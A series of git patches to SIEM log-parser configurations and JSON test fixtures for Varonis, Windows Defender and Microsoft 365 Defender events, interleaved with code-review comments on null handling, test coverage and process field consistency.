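Review bot: `user.name: "{{parsed_event.message.duser.split('\\\\')[-1]}}"` in the unconditional `set_cef_extension_fields` step, and the `filter: "{{parsed_event.message.duser.split('\\\\') | length > 1}}"` added in the later `user.domain` step, call `.split` on `duser` with no null check, whereas the replaced `"{{parsed_event.message.duser}}"` simply rendered empty when the extension was missing. I cannot see from here how this engine treats an undefined attribute, but if it raises, a CEF record without `duser` now fails the whole stage instead of dropping one field. Moving `user.name` into its own `- set:` with `filter: "{{parsed_event.message.duser != null}}"`, as the hunk already does for `user.domain`, and prefixing that domain filter with `parsed_event.message.duser != null and`, keeps the old tolerance. The enclosing `stages:` block starts and ends outside these hunks.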
@@ -124,3 +143,6 @@ stages:
 varonis.datalert.outcome: "{{parsed_event.message.outcome}}"
 varonis.datalert.num_events: "{{parsed_event.message.cnt}}"
 varonis.datalert.id: "{{parsed_event.message.externalId}}"
+ varonis.datalert.destination.device: "{{parsed_event.message.DestinationDeviceName}}"
+ varonis.datalert.description: "{{parsed_event.message.DescriptionAlert}}"
+ varonis.datalert.rule.storyline: "{{parsed_event.message.RuleStoryline}}"
diff --git a/Varonis/varonis-data-security/tests/test_intrusion.json b/Varonis/varonis-data-security/tests/test_intrusion.json
new file mode 100644
index 000000000..ec01ef401
--- /dev/null
+++ b/Varonis/varonis-data-security/tests/test_intrusion.json
@@ -0,0 +1,74 @@
+{
+ "input": {
+ "message": "0|Varonis Inc.|DatAdvantage|8.6.32|5011|User locked out|3|rt=Oct 14 2024 11:33:57 cat=Alert cs2=Lockout: Multiple account lock-out events cs2Label=RuleName cn1=136 cn1Label=RuleID end=Oct 14 2024 11:33:51 duser=COMPANY.LOCAL\\John Doe dhost=Host filePath=COMPANY.LOCAL/Company/arborescence/John DOE fname=John DOE act=User locked out dvchost= dvc= outcome=Success msg= cs3= cs3Label=AttachmentName cs4=http://srv-gar-vardsp/DatAdvantage/#/app/analytics/entity/Alert/12345678-abcd-1234-5678-abcdef012345 cs4Label=ClientAccessType deviceCustomDate1= fileType= cs1= cs1Label=MailRecipient suser= cs5= cs5Label=MailboxAccessType cnt=5 cs6= cs6Label=ChangedPermissions oldFilePermission= filePermission= dpriv= start=Oct 14 2024 11:29:48 DescriptionRule=Several account lock-out events occurred within a short time frame. This may indicate a brute-force attack aimed at stealing users' credentials, or causing a denial-of-service for multiple users. DescriptionAlert= RuleStoryline= Path=COMPANY.LOCAL/Company/arborescence/John DOE ActingObjectSAM=doe_j ActingObjectDomaineName=COMPANY.LOCAL AlertCategory=Intrusion AffectedObjectSAM=doe_j AffectedObjectDomain=COMPANY.LOCAL DestinationDip= DestinationDeviceName=",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Varonis Data Security",
+ "dialect_uuid": "7b75d498-4a65-4d44-aa81-31090d723a60"
+ }
+ }
+ },
+ "expected": {
+ "message": "0|Varonis Inc.|DatAdvantage|8.6.32|5011|User locked out|3|rt=Oct 14 2024 11:33:57 cat=Alert cs2=Lockout: Multiple account lock-out events cs2Label=RuleName cn1=136 cn1Label=RuleID end=Oct 14 2024 11:33:51 duser=COMPANY.LOCAL\\John Doe dhost=Host filePath=COMPANY.LOCAL/Company/arborescence/John DOE fname=John DOE act=User locked out dvchost= dvc= outcome=Success msg= cs3= cs3Label=AttachmentName cs4=http://srv-gar-vardsp/DatAdvantage/#/app/analytics/entity/Alert/12345678-abcd-1234-5678-abcdef012345 cs4Label=ClientAccessType deviceCustomDate1= fileType= cs1= 
cs1Label=MailRecipient suser= cs5= cs5Label=MailboxAccessType cnt=5 cs6= cs6Label=ChangedPermissions oldFilePermission= filePermission= dpriv= start=Oct 14 2024 11:29:48 DescriptionRule=Several account lock-out events occurred within a short time frame. This may indicate a brute-force attack aimed at stealing users' credentials, or causing a denial-of-service for multiple users. DescriptionAlert= RuleStoryline= Path=COMPANY.LOCAL/Company/arborescence/John DOE ActingObjectSAM=doe_j ActingObjectDomaineName=COMPANY.LOCAL AlertCategory=Intrusion AffectedObjectSAM=doe_j AffectedObjectDomain=COMPANY.LOCAL DestinationDip= DestinationDeviceName=",
+ "event": {
+ "action": "User locked out",
+ "category": [
+ "intrusion_detection"
+ ],
+ "dataset": "Alert",
+ "end": "2024-10-14T11:33:51Z",
+ "kind": "alert",
+ "severity": 3,
+ "type": [
+ "info"
+ ],
+ "url": "http://srv-gar-vardsp/DatAdvantage/#/app/analytics/entity/Alert/12345678-abcd-1234-5678-abcdef012345"
+ },
+ "@timestamp": "2024-10-14T11:29:48Z",
+ "destination": {
+ "user": {
+ "domain": "COMPANY.LOCAL",
+ "name": "doe_j"
+ }
+ },
+ "file": {
+ "name": "John DOE",
+ "path": "COMPANY.LOCAL/Company/arborescence/John DOE"
+ },
+ "host": {
+ "name": "Host"
+ },
+ "observer": {
+ "product": "DatAdvantage",
+ "vendor": "Varonis Inc.",
+ "version": "8.6.32"
+ },
+ "related": {
+ "user": [
+ "John Doe",
+ "doe_j"
+ ]
+ },
+ "rule": {
+ "description": "Several account lock-out events occurred within a short time frame. This may indicate a brute-force attack aimed at stealing users' credentials, or causing a denial-of-service for multiple users.",
+ "id": "136",
+ "name": "Lockout: Multiple account lock-out events"
+ },
+ "source": {
+ "user": {
+ "domain": "COMPANY.LOCAL",
+ "name": "doe_j"
+ }
+ },
+ "user": {
+ "domain": "COMPANY.LOCAL",
+ "name": "John Doe"
+ },
+ "varonis": {
+ "datalert": {
+ "num_events": 5,
+ "outcome": "Success"
+ }
+ }
+ }
+}
\ No newline at end of file
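Review bot: The fixture only exercises the `DOMAIN\\user` form of `duser` (`duser=COMPANY.LOCAL\\John Doe`), so the backslash-splitting templates introduced in parser.yml by this commit are never run against a bare user name or an empty `duser=`; a second case with `duser=jdoe` expecting `"name": "jdoe"` and no `user.domain` would pin that path. `DescriptionAlert=`, `RuleStoryline=` and `DestinationDeviceName=` are all empty here, so the three `varonis.datalert.*` mappings added in the same commit are not asserted either; the expected `varonis.datalert` object only checks `num_events` and `outcome`. Sample values for those extensions would make the new field mappings visible in the test.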
diff --git a/Varonis/varonis-data-security/tests/test_network_alert.json b/Varonis/varonis-data-security/tests/test_network_alert.json index fdb79d78f..c60398e8c 100644 --- a/Varonis/varonis-data-security/tests/test_network_alert.json +++ b/Varonis/varonis-data-security/tests/test_network_alert.json @@ -25,7 +25,7 @@ "rule": { "description": "SomeRule", "id": "666", - "name": "Some rule description" + "name": "SomeRule" }, "varonis": { "datalert": { From 08cd33001ba533daf30c207cb466bc6be0fa3b47 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 17 Oct 2024 14:11:27 +0200 Subject: [PATCH 161/317] fix/Windows: Addition of hash field for event 1120 --- Windows/windows/ingest/parser.yml | 32 ++++++---- Windows/windows/tests/defender_1120.json | 74 ++++++++++++++++++++++++ 2 files changed, 96 insertions(+), 10 deletions(-) create mode 100644 Windows/windows/tests/defender_1120.json diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 9c8ae969f..5709d4345 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -40,6 +40,17 @@ pipeline: value_sep: "=" item_sep: "," + - name: parsed_hashes_kv_2 + description: "Extract fields from hashes field" + filter: "{{json.event.Hashes != null or json.event.Hash != null}}" + external: + name: kv.parse-kv + properties: + input_field: "{{json.event.Hashes or json.event.Hash}}" + output_field: result + value_sep: ":" + item_sep: ";" + - name: parsed_message_xml # issue #31452 filter: "{{json.event.Message != null and ' Date: Thu, 17 Oct 2024 14:13:15 +0200 Subject: [PATCH 162/317] Fix on linting --- Windows/windows/tests/defender_1120.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Windows/windows/tests/defender_1120.json b/Windows/windows/tests/defender_1120.json index 26359dd41..072b3443f 100644 --- a/Windows/windows/tests/defender_1120.json +++ b/Windows/windows/tests/defender_1120.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}", "sekoiaio": { "intake": { "dialect": "Windows", "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be" } - }, - "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": 
\"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}" + } }, "expected": { "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}", From 600c4aaa9ec3774c37c3d084f9426a36989a1232 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Thu, 17 Oct 2024 16:12:08 +0200 Subject: [PATCH 163/317] fix(Microsoft): revert changes on the process.* fields about AdvancedHunting-DeviceEvents and AdvancedHunting-DeviceProcessEvents events. handling process.* fields for these events is more complex because the action, in the event, may influence the result. --- .../microsoft-365-defender/_meta/fields.yml | 24 -------- .../microsoft-365-defender/ingest/parser.yml | 56 ++++++------------- .../tests/test_device_event.json | 37 ++++++++---- .../tests/test_device_process_created.json | 8 +-- .../tests/test_device_process_events.json | 35 ++++++------ .../tests/test_local_ip.json | 39 +++++++++---- .../tests/test_process_error.json | 33 +++++------ 7 files changed, 106 insertions(+), 126 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 89168f3cf..3a95175de 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -816,30 +816,6 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword -process.parent.user.domain: - description: Domain of the account that ran the parent process responsible for the - event - name: process.parent.user.domain - type: keyword - -process.parent.user.email: - description: User principal name (UPN) of the account that ran the parent process - responsible for the event - name: process.parent.user.email - type: keyword - -process.parent.user.id: - description: Security Identifier (SID) of the account that ran the parent process - responsible for the event - name: process.parent.user.id - type: keyword - -process.parent.user.name: - description: User name of the account that ran the parent process responsible for - the event - name: process.parent.user.name - type: keyword - process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index d1793d4b2..f22b21ce1 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -126,6 +126,22 @@ stages:
 host.os.full: "{{json_event.message.properties.OSPlatform}}"
 host.os.version: "{{json_event.message.properties.OSVersion}}"
 host.type: "{{json_event.message.properties.DeviceType}}"
+ process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+ process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+ process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+ process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
+ process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
+ process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+ process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
+ process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+ process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+ process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+ process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+ process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+ process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+ process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
+ process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
+ process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
 registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
 registry.key:
"{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" 
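Review bot: The restored `process.*` block describes two different processes on AdvancedHunting-DeviceProcessEvents: `process.pid`, `process.start` and `process.command_line` prefer `ProcessId`, `ProcessCreationTime` and `ProcessCommandLine` (the created process), while `process.name`, `process.executable`, `process.hash.*` and `process.user.*` are taken from the `InitiatingProcess*` fields. The updated fixture test_device_process_events.json shows the effect: `process.name` becomes `MsMpEng.exe` with the initiating process's hashes, yet `process.command_line` is the `MpCmdRun.exe` invocation and `process.pid` stays 37788, so a detection rule that correlates `process.name` with `process.command_line` or `process.pid` sees inconsistent data on those events. The commit message defers category-specific handling, so at minimum the block should carry a comment such as `# NOTE: pid/start/command_line fall back to the created process (ProcessId/ProcessCreationTime/ProcessCommandLine) while name/executable/hash/user describe the initiating process; revisit for DeviceEvents and DeviceProcessEvents`; alternatively, preferring the `InitiatingProcess*` value first in those three `or` expressions would make the object describe a single process. The enclosing `- set:` step starts before the hunk.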
@@ -243,46 +259,6 @@ stages: - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' - - - set: - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: 
"{{json_event.message.properties.InitiatingProcessParentCreationTime}}" - filter: '{{ json_event.message.get("category") not in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}' - - - set: - process.name: "{{json_event.message.properties.FileName}}" - process.executable: "{{json_event.message.properties.FolderPath}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" - process.start: "{{json_event.message.properties.ProcessCreationTime}}" - process.pid: "{{json_event.message.properties.ProcessId}}" - process.hash.md5: "{{json_event.message.properties.MD5}}" - process.hash.sha1: "{{json_event.message.properties.SHA1}}" - process.hash.sha256: "{{json_event.message.properties.SHA256}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}" - process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - filter: '{{json_event.message.get("category") in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}' set_alert_evidence_fields: actions: - set: 
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index a1f8cc8d4..ca708b0ed 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -53,22 +53,35 @@ "--sandboxed-process-id=2", "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\"" ], + "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "software_reporter_tool.exe", "parent": { - "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", "name": "software_reporter_tool.exe", - "pid": 1664, - "start": "2022-09-01T06:56:23.788784Z", - "user": { - "domain": "intranet", - "email": "user@example.org", - "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", - "name": "group1" - }, - "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" - } + "pid": 15532, + "start": "2022-09-01T06:56:23.595229Z" + }, + "pid": 1664, + "start": "2022-09-01T06:56:23.788784Z", + "user": { + "domain": "intranet", + "email": "user@example.org", + "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "name": "group1" + }, + "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" }, "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + 
"51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + ], "ip": [ "1.2.3.4", "5.6.7.8" diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index 7acf31f01..cd2ca7981 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,11 +29,9 @@ } }, "process": { - "parent": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" - } + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 5d3587480..7d72e6264 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json 
@@ -74,32 +74,33 @@ "subject_name": "OsVendor" }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0\\MpCmdRun.exe", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", "hash": { - "md5": "17bd5d291205f95eb9ede9e75d5641d7", - "sha1": "81ea1283c9c328fef3ea93e92dc827f1280b32aa", - "sha256": "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf" + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" }, - "name": "MpCmdRun.exe", + "name": "MsMpEng.exe", "parent": { - "command_line": "\"MsMpEng.exe\"", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "name": "MsMpEng.exe", - "pid": 5456, - "start": "2023-01-03T08:51:29.269279Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "name": "services.exe", + "pid": 1032, + "start": "2023-01-03T08:51:26.740241Z" }, "pid": 37788, - "start": "2023-01-04T14:15:10.355033Z" + "start": "2023-01-04T14:15:10.355033Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "related": { "hash": [ "17bd5d291205f95eb9ede9e75d5641d7", + "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e", + "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "5d5608654828cf052ba013b3c37cbb61", "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf", "81ea1283c9c328fef3ea93e92dc827f1280b32aa" ], 
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 854ddd181..3cedbfdb3 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -49,20 +49,35 @@ "--sandboxed-process-id=2", "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\"" ], + "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "software_reporter_tool.exe", "parent": { - "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", "name": "software_reporter_tool.exe", - "pid": 1664, - "start": "2022-09-01T06:56:23.788784Z", - "user": { - "domain": "intranet", - "email": "user@example.org", - "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", - "name": "group1" - }, - "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" - } + "pid": 15532, + "start": "2022-09-01T06:56:23.595229Z" + }, + "pid": 1664, + "start": "2022-09-01T06:56:23.788784Z", + "user": { + "domain": "intranet", + "email": "user@example.org", + "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "name": "group1" + }, + "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + 
"51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + ] } } } \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index c1b661620..3a5d48cd4 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json 
@@ -60,32 +60,33 @@
 "subject_name": "Unknown"
 },
 "command_line": "grep -F smtpd_tls_protocols\\commandtest",
- "executable": "/usr/bin/grep",
+ "executable": "/usr/test/platform-python3.6",
 "hash": {
- "md5": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
- "sha1": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
- "sha256": "8def33333333643356354032379388263138839b9503f269f82e978413d669a0"
+ "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+ "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+ "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
 },
- "name": "grep",
+ "name": "platform-python3.6",
 "parent": {
- "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
- "executable": "/usr/test/platform-python3.6",
 "name": "platform-python3.6",
- "pid": 408996,
- "start": "2024-09-24T14:18:11.850000Z",
- "user": {
- "domain": "testdomain",
- "name": "testaccount"
- },
- "working_directory": "/usr/test"
+ "pid": 408229,
+ "start": "2024-09-24T14:17:34.790000Z"
 },
 "pid": 408996,
- "start": "2024-09-24T14:18:11.864114Z"
+ "start": "2024-09-24T14:18:11.864114Z",
+ "user": {
+ "domain": "testdomain",
+ "name": "testaccount"
+ },
+ "working_directory": "/usr/test"
 },
 "related": {
 "hash": [
+ "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565",
 "8def33333333643356354032379388263138839b9503f269f82e978413d669a0",
- "ff000000000aaaaaaaaaffb100000c0fb25ccccc6"
+ "eeeee2999444ddaaaaa08598b06eafe7",
+ "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
+ "ff77777000aaaaaaaaaffb100000c0fb25ccccc6"
 ],
 "user": [
 "testaccount"
